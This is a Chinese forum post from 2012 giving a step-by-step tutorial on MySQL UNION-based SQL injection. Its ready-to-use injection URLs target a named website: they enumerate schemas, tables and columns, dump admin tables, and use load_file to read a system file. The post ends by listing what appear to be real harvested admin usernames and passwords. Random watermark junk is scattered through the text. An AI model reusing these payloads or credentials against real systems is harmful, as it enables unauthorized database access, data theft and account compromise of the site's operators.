此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
) s* t) G$ G. L/ m1 M- h但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
: {+ D" C* i5 F& x3 e) w! l0 s( ^+ `* z6 [7 r# L* T
. C) a( @% {, s- s优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入( R$ P! B9 M. n
7 ]" d9 e0 R) N4 l
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
5 B) H8 N+ }3 w5 e: G( ?: D, I2 A$ y2 e0 h- r
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示$ n) E% B6 d; s5 U: l U# |! ?! n
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等4 J# A& K/ n5 x$ Z. N
. a4 {; i0 d" |' ~http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
9 R: J1 @2 q9 V0 L3 o" I" B) z
O( G P X9 G3 [读出所有库:+ g1 Q2 S# T# H) U- d
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA, h5 o% w3 ^6 {6 U2 l
9 ^+ y" W5 a7 p4 e8 f4 n s" R( X5 Q h8 B! j+ [. t* f, n0 Q
) N5 s2 d0 C" g2 n3 M7 t& x. F读出所有表:; m/ B* h' p1 M. U. |# X
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()/ a% X+ {. e. j& k F+ B' Y$ T
) B; T# @+ U0 _' W! E0 M
读出所有表字段:8 O0 X2 d8 b' q% W; K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)0 E% }/ a/ w3 E8 ?" e: O
*/ (97,100,109,105,110)为admin的ascii码 依次类推
) e. q3 c- @& g/ C, ?, B( v% b! N6 l& A9 a3 G- Z2 g
读出所有表字段里的内容:7 G* E5 J8 N8 G1 ?5 [8 x2 y* l
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
0 ]# |6 g* I+ \4 u' i5 W k
4 `2 U5 W! G! @
5 M( A! f' f2 r+ Y
# f" I5 y' v0 b8 @# d; Q' T5 N$ Q6 X! c
/ G4 }) v0 x, T- f0 j3 d
@& t# |- p" J! u7 dhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
# D. U+ }% n$ y, O: v1 L) M$ y/ x
5 F7 f) G3 [% S+ {1 d5 d; hhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
/ u0 f& }0 }1 {- u1 u# t3 ?* }- v/ O# _2 L( O
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
. _: I9 B c. H* G; B
" @* T6 @. t, h) o" i8 P) E, H1 w: f. B3 N! B7 N- k4 z9 l( @5 e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
5 {, s- R( u1 {7 T5 o7 a1 k1 F
% U4 a3 ]. l3 S
% L8 T4 b q1 n5 y webmaster:dzb521123,simlab:simadmin20043233
. l6 Q- ]( Q- F! r% I |
发表于 2012-9-13 16:37:34
收藏
支持
反对